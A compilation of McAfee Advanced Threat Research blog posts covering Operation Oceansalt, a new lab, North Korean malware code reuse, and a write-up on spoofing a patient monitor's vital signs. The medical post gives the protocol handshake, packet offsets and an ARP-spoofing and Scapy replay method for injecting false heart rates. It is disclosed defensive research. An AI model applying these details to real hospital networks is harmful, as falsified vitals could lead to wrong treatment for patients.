‘Operation Oceansalt’ Delivers Wave After Wave

A wall eight feet high with three strands of barbed wire is considered sufficient to deter a determined intruder, at least according to the advice offered by the CISSP professional certification. Although physical controls can be part of a multifaceted defense, an electronic attack affords the adversary time to develop the necessary tools to bypass …

The post ‘Operation Oceansalt’ Delivers Wave After Wave appeared first on McAfee Blogs.

A wall eight feet high with three strands of barbed wire is considered sufficient to deter a determined intruder, at least according to the advice offered by the CISSP professional certification. Although physical controls can be part of a multifaceted defense, an electronic attack affords the adversary time to develop the necessary tools to bypass any logical wall set before them. In the latest findings from the McAfee Advanced Threat Research team, we examine an adversary that was not content with a single campaign, but launched five distinct waves adapted to their separate targets. The new report “Operation Oceansalt Attacks South Korea, U.S., and Canada with Source Code from Chinese Hacker Group” analyzes these waves and their victims, primarily in South Korea but with a few in the United States and Canada.

Although one reaction is to marvel at the level of innovation displayed by the threat actor(s), we are not discussing five new, never-before-seen malware variants—rather the reuse of code from implants seen eight years prior. The Oceansalt malware uses large parts of code from the Seasalt implant, which was linked to the Chinese hacking group Comment Crew. The level of reuse is graphically depicted below:

Code Visualization of Recent Oceansalt with Older Seasalt

Oceansalt, 2018.

Seasalt, 2010.

Who is Behind the Oceansalt Attack?

Originally taking the title APT1, the Comment Crew was seen as the threat actor conducting offensive cyber operations against the United States almost 10 years before. The obvious suspect is Comment Crew and, although this may seem a logical conclusion, we have not seen any activity from this group since they were initially exposed. Is it possible that this group has returned and, if so, why target South Korea?

It is possible that the source code developed by Comment Crew has now been used by another adversary. The code to our knowledge, however, has never been made public. Alternatively, this could be a “false flag” operation to suggest that we are seeing the re-emergence of Comment Crew. Creating false flags is a common practice.

What Really Matters

It is likely that reactions to this research will focus on debating the identity of the threat actor. Although this question is of great interest, answering it will require more than the technical evidence that private industry can provide. These limitations are frustrating. However, we can focus on the indicators of compromise presented in this report to detect, correct, and protect our systems, regardless of the source of these attacks.

Perhaps more important is the possible return of a previously dormant threat actor and, further, why should this campaign occur now? Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown. However, one thing is certain. Threat actors have a wealth of code available to leverage new campaigns, as previous research from the Advanced Threat Research team has revealed. In this case we see that collaboration not within a group but potentially with another threat actor—offering up considerably more malicious assets. We often talk about partnerships within the private and public sector as the key to tackling the cybersecurity challenges facing society. The bad actors are not putting these initiatives on PowerPoint slides and marketing material; they are demonstrating that partnerships can suit their ends, too.

The post ‘Operation Oceansalt’ Delivers Wave After Wave appeared first on McAfee Blogs.

McAfee Opens State-of-the-Art Security Research Lab in Oregon

McAfee’s Advanced Threat Research team has operated from several locations around the world for many years. Today we are pleased to announce the grand opening of our dedicated research lab in the Hillsboro, Oregon, office near Portland. Although we hav…

McAfee’s Advanced Threat Research team has operated from several locations around the world for many years. Today we are pleased to announce the grand opening of our dedicated research lab in the Hillsboro, Oregon, office near Portland. Although we have smaller labs in other locations, the new McAfee Advanced Threat Research Lab was created to serve two purposes. First, it gives our talented researchers an appropriate work space with access to high-end hardware and electronics for discovery, analysis, automation, and exploitation of vulnerabilities in software, firmware, and hardware. Second, the lab will serve as a demo facility, where the Advanced Threat Research team can showcase current research and live demos to customers or potential customers, law enforcement partners, academia, and even vendors.

The lab has been a labor of love for the past year, with many of the team members directly contributing to the final product. Visitors will have the unique opportunity to experience live and recorded demos in key industry research areas, including medical devices, autonomous and connected vehicles, software-defined radio, home and business IoT, blockchain attacks, and even lock picking! Our goal is to make vulnerability research a tangible and relatable concept, and to shed light on the many security issues that plague nearly every industry in the world.

Much of the research highlighted in the lab has been disclosed by McAfee. Links to recent disclosures from the Advanced Threat Research team:

Articles

Podcasts

Security researcher Douglas McKee prepares his demo of hacking a medical patient’s vitals. 

Onsite visitors will have the opportunity to solve a unique, multipart cryptographic challenge, painted on our custom mural wall in the lab. Those who are successful will receive an Advanced Threat Research team challenge coin! We will soon have an official video from the lab’s opening event online.

The post McAfee Opens State-of-the-Art Security Research Lab in Oregon appeared first on McAfee Blogs.

80 to 0 in Under 5 Seconds: Falsifying a Medical Patient’s Vitals

The author thanks Shaun Nordeck, MD, for his assistance with this report.
With the explosion of growth in technology and its influence on our lives, we have become increasingly dependent on it. The medical field is no exception: Medical professionals …

The author thanks Shaun Nordeck, MD, for his assistance with this report.

With the explosion of growth in technology and its influence on our lives, we have become increasingly dependent on it. The medical field is no exception: Medical professionals trust technology to provide them with accurate information and base life-changing decisions on this data. McAfee’s Advanced Threat Research team is exploring these devices to increase awareness about their security.

Some medical devices, such as pacemakers and insulin pumps, have already been examined for security concerns. To help select an appropriate target for our research, we spoke with a doctor. In our conversations we learned just how important the accuracy of a patient’s vital signs is to medical professionals. “Vital signs are integral to clinical decision making” explained Dr. Shaun Nordeck. Bedside patient monitors and related systems are key components that provide medical professionals with the vital signs they need to make decisions; these systems are now the focal point of this research.

Exploring the attack surface

Most patient monitoring systems comprise at minimum of two basic components: a bedside monitor and a central monitoring station. These devices are wired or wirelessly networked over TCP/IP. The central monitoring station collects vitals from multiple bedside monitors so that a single medical professional can observe multiple patients.

With the help of eBay, we purchased both a patient monitor and a compatible central monitoring station at a reasonable cost. The patient monitor monitored heartbeat, oxygen level, and blood pressure. It has both wired and wireless networking and appeared to store patient information. The central monitoring station ran Windows XP Embedded, with two Ethernet ports, and ran in a limited kiosk mode at start-up. Both units were produced around 2004; several local hospitals confirmed that these models are still in use.

The two devices offer a range of potential attack surfaces. The central monitoring station operates fundamentally like a desktop computer running Windows XP, which has been extensively researched by the security community. The application running on the central monitoring station is old; if we found a vulnerability, it would likely be tied to the legacy operating system. The patient monitor’s firmware could be evaluated for vulnerabilities; however, this would affect only one of the two devices in the system and is the hardest vector to exploit. This leaves the communication between the two devices as the most interesting attack vector since if the communication could be compromised, an attack could possibly be device independent, affecting both devices by a remote attack. Given this possibility, we chose networking as the first target for this research. Dr. Nordeck confirmed that if the information passing to the central monitoring system could be modified in real time, this would be a meaningful and valid concern to medical professionals. Thus the primary question of our research became “Is it possible in real time to modify a patient’s vitals being transmitted over the network?”

Setup

When performing a vulnerability assessment of any device, it is best to first operate the device as originally designed. Tracking vital signs is the essence of the patient monitor, so we looked for a way to accurately simulate those signs for testing. Many hardware simulators are on the market and vary drastically in cost. The cheapest and easiest vital sign to simulate turned out to be a heartbeat. For less than $100 we purchased an electrocardiogram (ECG) simulator on eBay. The following image illustrates our test network:

In our test bed, the patient monitor (left), central monitoring station (right), and a research computer (top) were attached to a standard switch. The research computer was configured on a monitor port of the switch to sniff the traffic between the central monitoring device and the patient monitor. The ECG simulator was attached to the patient monitor.

Reconnaissance

With the network configured, we turned to Wireshark to watch the devices in action. The first test was to boot only the central monitor station and observe any network traffic.

In the preceding screenshot a few basic observations stand out. First, we can see that the central station is sending User Datagram Protocol (UDP) broadcast packets every 10 seconds with a source and destination port of 7000. We can also see clear-text ASCII in the payload, which provides the device name. After collecting and observing these packets for several minutes, we can assume this is standard behavior. Because the central station is running on a Window XP embedded machine, we can attempt to verify this information by doing some quick reverse engineering of the binaries used by the application. After putting several libraries into Interactive Disassembler Pro, it is apparent that the symbols and debugging information has been left behind. With a little cleanup and work from the decompilers, we see the following code:

This loop calls a function that broadcasts Rwhat, a protocol used by some medical devices. We also can see a function called to get the amount of time to wait between packets, with the result plugged into the Windows sleep function. This code block confirms what we saw with Wireshark and gives us confidence the communication is consistent.

Having gained basic knowledge of the central monitoring station, the next step was to perform the same test on the patient monitor. With the central station powered down, we booted the patient monitor and watched the network traffic using Wireshark.

We can make similar observations about the patient monitor’s broadcast packets, including the 10-second time delay and patient data in plaintext. In these packets we see that the source port is incrementing but the destination port, 7000, is the same as the central monitoring station’s.  After reviewing many of these packets, we find that offset 0x34 of the payload has a counter that increments by 0xA, or 10, with each packet. Without potentially damaging the patient monitor, there is no good way to extract the firmware to review its code. However, the central monitoring station must have code to receive these packets. With a bit of digging through the central station’s binaries, we found the section parsing the broadcast packets from the patient monitor.

The first line of code parses the payload of the packet plus 12 bytes. If we count in 12 bytes from the payload on the Wireshark capture, we can see the start of the patient data in clear text. The next function called is parse_logical_name, whose second parameter is an upper limit for the string being passed. This field has a maximum length of 0x20, or 32, bytes. The subsequent code handles whether this information is empty and stores the data in the format logical_name. This review again helps confirm what we see in real time with Wireshark.

Now that we understand the devices’ separate network traffic, we can look at how they interact. Using our network setup and starting the ECG simulator we can see the central monitor station and the patient monitor come to life.

With everything working, we again use Wireshark to examine the traffic. We find a new set of packets.

In the preceding screen capture we see the patient monitor at IP address 126.4.153.150 is sending the same-size data packets to the central monitoring station at address 126.1.1.1. The source port does not change.

Through these basic tests we learn a great deal:

  • The two devices are speaking over unencrypted UDP
  • The payload contains counters and patient information
  • The broadcast address does not require the devices to know each other’s address beforehand
  • When the data is sent distinct packets contain the waveform

Attacking the protocol

Our reconnaissance tells us we may have the right conditions for a replay attack. Such an attack would not satisfy our goal of modifying data in real time across the network; however, it would provide more insight about the requirements and may prove useful in reaching our goal.

After capturing the packets from the simulated heartbeat, we attempted to replay the captures using Python’s Scapy library. We did this with the patient monitor turned off and the central monitoring station listening for information. After several attempts, this test was unsuccessful. This failure shows the system expects more than just a device sending data packets to a specific IP address.

We examined more closely the packets that are sent before the data packets. We learned that even though the packets are sent with UDP, some sort of handshake is performed between the two devices. The next diagram describes this handshake. 

 

In this fanciful dialog, CMS is the central monitoring system; PM is the patient monitor.

To understand what is happening during the handshake, we can relate each phase of this handshake to that of a TCP three-way handshake. (This is only an analogy; the device is not actually performing a TCP three-way handshake.)

The central monitoring station first sends a packet to port 2000 to the patient monitor. This can be considered the “SYN” packet. The patient monitor responds to the central station; notice it responds to the source port of the initial request. This can be considered the “SYN,ACK.” The central station sends the final “ACK,” essentially completing a three-way (or three-step) handshake. Directly following this step, the patient monitor sends another packet to the initial port of the “SYN” packet. The central monitor responds to the patient monitor on port 2000 with a new source port. Immediately following, we see the data packets being sent to the new source port, 3627, named in the previous exchange.

This exam provides insight into why the replay attack did not work. The central station defines for each connection which ports will be open for the incoming data; we need to consider this when attempting a replay attack. Modifying our previous Scapy scripts to account for the handshake, we retested the replay attack. With the new handshake code in place, the test still failed. Taking another look at the “SYN,ACK” packets provides a potential reason for the failure.

At offset 0x3D is a counter that needs to be incremented each time one of these packets is sent. In this case the patient monitor’s source IP address is embedded in the payload at offsets 0x2A and 0x30. This embedded IP address is not as important for this attack because during the replay our scripts can become the patient monitor’s IP; however, this will become more important later. The newly discovered counter needs to be accounted for and incremented.

Emulating a patient monitor

By taking these new findings into account our replay attack becomes successful. If we can observe a certain ECG pattern, we can play it back to the central monitoring station without the patient monitor on the network. Thus we can emulate the function of the patient monitor with any device. The following video demonstrates this emulation using a Raspberry Pi. We set our Scapy scripts to load after booting the Pi, which mimics the idle function of the patient monitor. When the central monitor requests information about the patient’s vitals, the Pi provides the station with an 80-beats-per-minute wave form. This also works with the other vital signs.

Impact of emulation

Although we have not yet reached our goal of real-time modification, we must consider the implications of this type of attack. If someone were to unplug the monitor of a stable patient and replace it with a device that continued to report the same stable vitals, would that cause any harm? Probably not immediately. But what if the stable patient suddenly became unstable? The central station would normally sound an alarm to alert medical personal, who could take appropriate action. However, if the monitor had been replaced, would anyone know help was needed? The patient monitor also normally sounds alarms that might be heard in and outside of the patient’s room, yet if the monitor was replaced, those alarms would be absent.

In hospitals, nurses and other personal generally make periodic checks even of stable patients. So any deception might not last long, but it might not need to. What if someone were trying to kidnap a patient? A kidnapper would alert fewer people than would be expected.

Switching from a real patient monitor to an emulator would cause a short loss in communication from the patient’s room to the central monitoring station. Is this enough to make the scenario unrealistic or not a threat? We asked Dr. Nordeck if a short loss in connection could be part of a reasonable scenario. “A momentary disconnection of the ECG would likely go unnoticed as this happens often due to patient movement or changing clothes and, as long as it is reconnected, will be unlikely to cause an alert,” he said.

Modifying vitals in real time

Although emulating the patient monitor is interesting, it did not accomplish our goal of making real-time modifications. Using what we learned while testing emulation, could we perform real-time injection? To answer this question, we must first understand the difference between emulation and real-time injection.

Emulation requires a deeper understanding of how the initial connection, the handshake, between the two devices occurred. When considering real-time modification, this handshake has already taken place. But an attacker would not know which port the data packets are being sent too, nor any of the other ports used in the data stream. Plus, because the real patient monitor is still online, it will constantly send data to the central monitoring station.

One way to account for these factors is to use Address Resolution Protocol (ARP) spoofing. If the patient monitor is ARP spoofed, then the attacker, instead of the central monitoring station, would receive the data packets. This step would allow the attacker to determine which ports are in use and stop the patient monitor’s data from getting to the central monitoring station. Because we have already shown that emulation works, the attacker simply has to send replacement data to the central station while appearing as the patient monitor.

For example, consider the following original packet coming from the patient monitor:

The patient monitor sends a packet with the patient’s heartbeat stored at offset 0x71 in the payload. The patient monitor in this screen capture is at IP address 126.4.153.150. An attacker can ARP spoof the patient monitor with a Kali virtual machine.

The ARP packets indicate that the central station, IP address 126.1.1.1, is at MAC address 00:0c:29:a1:6e:bf, which is actually the Kali virtual machine. Wireshark recognizes two MACs with the same IP address assigned and highlights them, showing the ARP spoof.

Next the attacker from the virtual machine at address 126.4.153.153 sends false information to the central monitoring station, still at address 126.1.1.1. In this example, offset 0x71 has been changed to 0x78, or 120. (The attacker could choose any value; the following demo videos use the heartbeat value 180 because it is more alarming.) Also notice the IP address stored in the payload, which we discovered during the reconnaissance phase. It still indicates this data is coming from the original patient monitor address, which is different from the IP address on the packet’s IP header. Due to this implementation, there is no need for the attacker to spoof their IP address for the attack to be successful.

Two videos show this modification happening in real time:

 

Impact of real-time modification

Although the monitor in the patient’s room is not directly affected, real-time modification is impactful because medical professionals use these central stations to make critical decisions on a large number of patients—instead of visiting each room individually. As long as the changes are believable, they will not always be verified.

Dr. Nordeck explains the impact of this attack: “Fictitious cardiac rhythms, even intermittent, could lead to extended hospitalization, additional testing, and side effects from medications prescribed to control heart rhythm and/or prevent clots. The hospital could also suffer resource consumption.” Dr. Nordeck explained that short changes to a heartbeat would generally trigger the nurse or technician monitoring the central station to page a doctor. The doctor would typically ask for a printout from the central station to review the rhythm. The doctor might also order an additional test, such as an EKG, to verify the rhythm. An EKG, however, would not likely capture an abnormal rhythm if it is intermittent, but the test might reveal an underlying cause for intermittent arrythmia. Should the rhythm recur intermittently throughout the day, the doctor might make treatment decisions based on this erroneous printout.

The American Heart Association and American College of Cardiology publish guidelines that hospitals are to follow, including for “intermittent cardiac rhythms,” seen in this chart:

A decision tree for treating an intermittent heart rate. Source: American Heart Association.

The first decision point in this tree asks if the patient is hemodynamically stable (whether the blood pressure is normal). This attack does not affect the bedside monitor. A nurse might retake the patient’s blood pressure, which would be normal. The next decision point following the “Yes” path is a diagnosis of focal atrial tachycardia. Regardless of the medical terms and answers, the patient is issued medication. In the case of a network attack, this is medication the patient does not need and could cause harm.

Conclusion

This research from McAfee’s Advanced Threat Research team shows it is possible to emulate and modify a patient’s vital signs in real time on a medical network using a patient monitor and central monitoring station. For this attack to be viable, an attacker would need to be on the same network as the devices and have knowledge of the networking protocol. Any modifications made to patient data would need to be believable to medical professionals for there to be any impact.

During our research we did not modify the patient monitor, which always showed the true data; but we have proven the impact of an attack can be meaningful. Such an attack could result in patients receiving the wrong medications, additional testing, and extended hospital stays—any of which could incur unnecessary expenses.

Both product vendors and medical facilities can take measures to drastically reduce the threat of this type of attack. Vendors can encrypt network traffic between the devices and add authentication. These two steps would drastically increase the difficulty of this type of attack. Vendors also typically recommend that medical equipment is run on a completely isolated network with very strict network-access controls. If medical facilities follow these recommendations, attackers would require physical access to the network, greatly helping to reduce the attack surface.

One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. Through responsible disclosure we aim to assist and encourage the industry toward a more comprehensive security posture. As part of our policy, we reported this research to the vendor whose products we tested and will continue to work with other vendors to help secure their products.

The post 80 to 0 in Under 5 Seconds: Falsifying a Medical Patient’s Vitals appeared first on McAfee Blogs.

Examining Code Reuse Reveals Undiscovered Links Among North Korea’s Malware Families

This research is a joint effort by Jay Rosenberg, senior security researcher at Intezer, and Christiaan Beek, lead scientist and senior principal engineer at McAfee. Intezer has also posted this story. 
Attacks from the online groups Lazarus, Silent Ch…

This research is a joint effort by Jay Rosenberg, senior security researcher at Intezer, and Christiaan Beek, lead scientist and senior principal engineer at McAfee. Intezer has also posted this story. 

Attacks from the online groups Lazarus, Silent Chollima, Group 123, Hidden Cobra, DarkSeoul, Blockbuster, Operation Troy, and 10 Days of Rain are believed to have come from North Korea. But how can we know with certainty? And what connection does a DDoS and disk-wiping attack from July 4, 2009, have with WannaCry, one of the largest cyberattacks in the history of the cyber sphere?  

From the Mydoom variant Brambul to the more recent Fallchill, WannaCry, and the targeting of cryptocurrency exchanges, we see a distinct timeline of attacks beginning from the moment North Korea entered the world stage as a significant threat actor.

Bad actors have a tendency to unwittingly leave fingerprints on their attacks, allowing researchers to connect the dots between them. North Korean actors have left many of these clues in their wake and throughout the evolution of their malware arsenal.

This post reflects months of research; in it we will highlight our code analysis illustrating key similarities between samples attributed to the Democratic People’s Republic of Korea, a shared networking infrastructure, and other revealing data hidden within the binaries. Together these puzzle pieces show the connections between the many attacks attributed to North Korea and categorize different tools used by specific teams of their cyber army.

Valuable context 

This article is too short to dig deeply into the history, politics, and economic changes of recent years. Nonetheless, we must highlight some events to put past and present cyber events into perspective.

The DPRK, like any country, wants to be as self-sufficient and independent as possible. However, for products such as oil, food, and foreign currency for trading, the country lacks resources and has to find ways of acquiring them. What can a nation do when legal international economics are denied? To survive, it must gain foreign currency for trading. One of the oldest ways to do this is to join the worlds of gambling (casinos) and drugs. In 2005, the United States wanted to shut down North Korean enterprises involved in illegal operations. They investigated a couple of banks in Asia that seemed to have ties with North Korea and operated as money laundering sites. One bank in particular is controlled by a billionaire gambling mogul who started a casino in Pyongyang and has close ties to Pyongyang. That bank, based in Macau, came back into the picture during an attack on the SWIFT financial system of a bank in Vietnam in 2015. The Macau bank was listed twice in the malware’s code as a recipient of stolen funds:

Figure 1: SWIFT code in malware.

Code reuse

There are many reasons to reuse malware code, which is very common in the world of cybercrime. If we take an average ransomware campaign, for example, once the campaign becomes less successful, actors often change some of basics such as using a different packer to bypass defenses. With targeted campaigns, an adversary must keep its tools undetected for as long as possible. By identifying reused code, we gain valuable insights about the “ancestral relations” to known threat actors or other campaigns. Our research was heavily focused on this type of analysis.

In our years of investigating cyber threats, we have seen the DPRK conduct multiple cyber campaigns. In North Korea, hackers’ skills determine which cyber units they work for. We are aware two major focuses of DPRK campaigns: one to raise money, and one to pursue nationalist aims. The first workforce gathers money for the nation, even if that means committing cybercrime to hack into financial institutions, hijack gambling sessions, or sell pirated and cracked software. Unit 180 is responsible for illegally gaining foreign currency using hacking techniques. The second workforce operates larger campaigns motivated by nationalism, gathering intelligence from other nations, and in some cases disrupting rival states and military targets. Most of these actions are executed by Unit 121.

We focused in our research on the larger-scale nationalism-motivated campaigns, in which we discovered many overlaps in code reuse. We are highly confident that nation-state–sponsored groups were active in these efforts.

Timeline 

We created a timeline of most of the malware samples and noticeable campaigns that we examined. We used primarily open-source blogs and papers to build this timeline and used the malware artifacts as a starting point of our research.

 

Figure 2: Timeline of malware and campaigns.

Analysis and observations

Similarities

During our research, we found many malware family names that are believed to be associated with North Korea’s cyber operations. To better understand this threat actor and the similarities between the campaigns, we have used Intezer’s code similarity detection engine to plot the links between a vast number of these malware families.

The following graph presents a high-level overview of these relations. Each node represents a malware family or a hacking tool (“Brambul,” “Fallchill,” etc.) and each line presents a code similarity between two families. A thicker line correlates to a stronger similarity. In defining similarities, we take into account only unique code connections, and disregard common code or libraries. This definition holds both for this graph and our entire research.

 

Figure 3: Code similarities between North Korean–associated malware families.

We can easily see a significant amount of code similarities between almost every one of the attacks associated with North Korea. Our research included thousands of samples, mostly unclassified or uncategorized. This graph was plotted using a data set of only several hundred samples, so there might be more connections than displayed here. 

Deep technical analysis 

During our research, we came across many code similarities between North Korean binaries that had not been seen before. Some of these attacks and malware have not been linked to one another, at least publicly. We will showcase four examples of reused code that has been seen only in malware attributed to North Korea.

  1. Common SMB module

The first code example appeared in the server message block (SMB) module of WannaCry in 2017, Mydoom in 2009, Joanap, and DeltaAlfa. Further shared code across these families is an AES library from CodeProject. These attacks have been attributed to Lazarus; that means the group has reused code from at least 2009 to 2017.

Figure 4: Code overlap of a Mydoom sample.

In the next screenshots we highlight the exact code block that reflects the SMB module we found in campaigns other than WannaCry and Mydoom.

Figure 5: An SMB module common to several attacks.

A lot has been written about WannaCry. As we analyze the code against our databases, we can draw the following overview:

Figure 6: WannaCry code comparison overview.

For our research we compared the three major variants of WannaCry. An early release, called a beta, from February 2017, one from April, and the infamous one that hit the world in May.

  1. Common file mapping

The second example demonstrates code responsible for mapping a file and using the XOR key 0xDEADBEEF on the first four bytes of the file. This code has appeared in the malware families NavRAT and Gold Dragon, plus a certain DLL from the South Korean gambling hacking campaign. These three RATs are thought to be affiliated with North Korea’s Group 123. NavRAT and the gambling DLL share more code, making them closer variants.

Figure 7: Code overlap in a NavRAT sample.

Figure 8: File-mapping code 

  1. Unique net share

The third example, responsible for launching a cmd.exe with a net share, has been seen in 2009’s Brambul, also known as SierraBravo, as well as KorDllBot in 2011. These malware families are also attributed to the Lazarus group.

Figure 9: Code overlap of a SierraBravo (Brambul) sample.

Figure 10: A code block reused in the malware families Brambul/SierraBravo and KorDllBot.

  1. Operation Dark Hotel

In 2014, Kaspersky reported a more than seven-year campaign against Asian hotels, in which the adversaries used an arsenal of tools to break into the computers of hotel visitors. Zero days and control servers were used, along with the malware family Tapaoux, or DarkHotel, according to the report.

While we examined the DPRK samples, we noticed a hit with the Dark Hotel samples in our collections. By going through the code, we noticed several pieces of code overlap and reuse, for example, with samples from Operation Troy.

Figure 11: Code overlap in a Dark Hotel sample.

Identifying a group

By applying what we learned from our comparisons and code-block identifications, we uncovered possible new links between malware families and the groups using them.

With the different pieces of malware we have analyzed, we can illustrate the code reuse and sharing between the groups known to be affiliated with North Korea.

 

Figure 12: Groups and families linked by code reuse.

The malware attributed to the group Lazarus has code connections that link many of the malware families spotted over the years. Lazarus is a collective name for many DPRK cyber operations, and we clearly see links between malware families used in different campaigns.

The malware (NavRAT, gambling, and Gold Dragon) possibly created by Group 123 are connected to each other but are separate from those used by Lazarus. Although these are different units focusing on different areas, there seems to be a parallel structure in which they collaborate during certain campaigns.

MITRE ATT&CK

From our research of these malware samples, we can identify the following techniques used by the malware families:

When we zoom in on the Discovery category in the MITRE model, for example, we notice that the techniques are typical for first-stage dropper malware. The adversary drops these samples on victims’ machines and collects information on where they landed in the victims’ networks and which user/access rights they gained.

In 2018, we saw examples of campaigns in which attackers used PowerShell to download and execute these droppers. Once information has been sent to a control server, the adversary determines the next steps, which often include installing a remote access tool to enable lateral movement on the network and pursue the goals of the campaign.

Final words

Security vendors and researchers often use different names when speaking about the same malware, group, or attack. This habit makes it challenging to group all the malware and campaigns. By taking a scientific approach, such as looking for code reuse, we can categorize our findings. We believe our research will help the security community organize the current “mess” we face in relation to North Korean malware and campaigns.

We clearly saw a lot of code reuse over the many years of cyber campaigns we examined. This indicates the North Koreans have groups with different skills and tools that execute their focused parts of cyber operations while also working in parallel when large campaigns require a mix of skills and tools.

We found our months of research, data gathering, and analysis very satisfying. By combining our skills, data, and technology, we were able to draw connections and reveal links that we had not seen before. The cybersecurity industry would greatly benefit from more collaboration and sharing of information, and we hope that this effort between McAfee and Intezer will inspire the community to work together more often.

The authors thank Costin Raiu for providing them with samples they did not have in their collections.

Sources

Glenn Simpson, Gordon Fairclough, and Jay Solomon, “U.S. Probes Banks’ North Korea Ties.” Wall Street Journal, last updated September 8, 2005.

Christiaan Beek, “Attacks on SWIFT Banking system benefit from insider knowledge.” https://securingtomorrow.mcafee.com/mcafee-labs/attacks-swift-banking-system-benefit-insider-knowledge/

Atif Mushtaq, “DDOS Madness Continued…” https://www.fireeye.com/blog/threat-research/2009/07/ddos-madness-climax.html

Ryan Sherstobitoff and Jessica Saavedra-Morales, “Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems.” https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/ 

Alex Drozhzhin, “Darkhotel: a spy campaign in luxury Asian hotels.” https://www.kaspersky.com/blog/darkhotel-apt/6613/ 

Warren Mercer, Paul Rascagneres, and Jungsoo An, “NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea.” https://blog.talosintelligence.com/2018/05/navrat.html 

Sergei Shevchenko and Adrian Nish, “Cyber Heist Attribution.https://baesystemsai.blogspot.com/2016/05/cyber-heist-attribution.html

Mydoom code reuse report. https://analyze.intezer.com/#/analyses/113ba80f-1680-43d7-b287-cc62f3740fad

NavRAT code reuse report. https://analyze.intezer.com/#/analyses/4f19fd5a-a898-4fdf-96c9-d3a4aad817cb

SierraBravo code reuse report. https://analyze.intezer.com/#/analyses/8da8104e-56e4-49fd-ba24-82978bc1610c

Dark Hotel code reuse report. https://analyze.intezer.com/#/analyses/c034e0fe-7825-4f6d-b092-7c5ee693aff4

Kang Jang-ho, “A foreign currency earned with a virtual currency … What is the life of a North Korean hacker?” http://m.mtn.co.kr/news/news_view.php?mmn_idx=2018062517065863930#_enliple

Awesome work by the team responsible for the “Operation Blockbuster” report. https://www.operationblockbuster.com/resources/

The post Examining Code Reuse Reveals Undiscovered Links Among North Korea’s Malware Families appeared first on McAfee Blogs.